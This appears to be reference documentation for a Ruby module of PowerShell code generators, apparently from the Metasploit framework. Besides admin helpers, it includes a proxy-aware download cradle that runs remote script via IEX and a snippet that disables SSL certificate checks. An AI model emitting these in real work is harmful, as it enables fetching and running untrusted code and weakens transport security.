module Rex::Powershell::PshMethods
Convenience methods for generating powershell code in Ruby
Public Class Methods
Download file via .NET WebClient
@param src [String] URL to the file @param target [String] Location to save the file
@return [String] Powershell
code to download a file
# File lib/rex/powershell/psh_methods.rb, line 16 def self.download(src, target) target ||= '$pwd\\' << src.split('/').last %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^ end
Return last time of login
@param user [String] Username
@return [String] Powershell
code to return the last time of a user
login
# File lib/rex/powershell/psh_methods.rb, line 62 def self.get_last_login(user) %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^ end
Disable SSL Certificate verification
@return [String] Powershell
code to disable SSL verification
checks.
# File lib/rex/powershell/psh_methods.rb, line 71 def self.ignore_ssl_certificate '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};' end
Use the default system web proxy and credentials to download a URL as a string and execute the contents as PowerShell
@param url [String] string to download
@return [String] PowerShell code to download a URL
# File lib/rex/powershell/psh_methods.rb, line 82 def self.proxy_aware_download_and_exec_string(url) var = Rex::Text.rand_text_alpha(1) cmd = "$#{var}=new-object net.webclient;" cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();" cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;" cmd << "IEX $#{var}.downloadstring('#{url}');" cmd end
Create secure string from plaintext
@param str [String] String to create as a SecureString
@return [String] Powershell
code to create a SecureString
# File lib/rex/powershell/psh_methods.rb, line 40 def self.secure_string(str) %Q(ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$) end
Uninstall app, or anything named like app
@param app [String] Name of application @param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to
the application name
@return [String] Powershell
code to uninstall an application
# File lib/rex/powershell/psh_methods.rb, line 29 def self.uninstall(app, fuzzy = true) match = fuzzy ? '-like' : '-eq' %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^ end
Find
PID of file lock owner
@param filename [String] Filename
@return [String] Powershell
code to identify the PID of a file
lock owner
# File lib/rex/powershell/psh_methods.rb, line 51 def self.who_locked_file(filename) %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^ end